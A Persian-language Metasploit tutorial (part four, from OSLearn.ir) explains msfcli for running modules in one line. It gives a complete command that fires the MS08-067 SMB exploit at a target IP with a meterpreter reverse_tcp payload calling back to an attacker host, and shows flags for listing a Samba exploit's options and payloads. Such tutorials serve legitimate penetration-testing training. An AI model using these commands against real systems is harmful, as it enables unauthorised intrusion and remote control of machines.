منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : Msfcli

سلام دوستان . قسمت چهارم از آموزش های متااسپلویت را در پیش رو داریم . قبلا با کنسول متااسپلویت آشنا شده ایم اما می توان به جای وارد کردن تک تک دستورات , همه را در یک خط نوشت و آن را اجرا کرد . مثلا زمانی رو فرض کنید که می دانیم دقیقا چه exploit و چه payload و … را لازم داریم . پس به جای کار با کنسول که شاید زمان بر هم باشد , همه را در یک خط می نویسیم و سپس آن را اجرا می کنیم .

برای این منظور از msfcli استفاده می کنیم . برای مشاهده قابلیت های این برنامه به صورت زیر عمل می کنیم :

root@kali:~# msfcli -h

به عنوان مثال :

msfcli exploit/windows/smb/ms08_067_netapi RHOST=172.16.40.20 PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.40.10 E

همان طور که مشاهده می کنید ابتدا exploit و سپس payload مورد نظر را همراه با option هایش مشخص کردیم .

OSLearn.ir_01

حرف بزرگ E در آخر دستور بالا به منظور اجرای این فرایند می باشد .

(E)xecute      Execute the selected module

نکته : همان طور که از خروجی help برنامه مشخص است , حرف بزرگ O به منظور نمایش دادن option های یک module است . به عنوان مثال برای مشاهده ی option های یک exploit به صورت زیر عمل می کنیم :

root@kali:~# msfcli exploit/multi/samba/usermap_script O

نکته : برای مشاهده ی payload های فعال یک exploit از حرف بزرگ P استفاده می کنیم . به عنوان مثال :

root@kali:~# msfcli exploit/multi/samba/usermap_script P

 

لازم به ذکر است که می توان msfcli در اسکریپت نویسی نیز استفاده کرد چرا که تمامی کار های مربوط به metasploit را می تواند در یک خط انجام دهد و دیگر نیازی به رابط کنسول نباشد .

 

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N



برچسب ها : , , , ,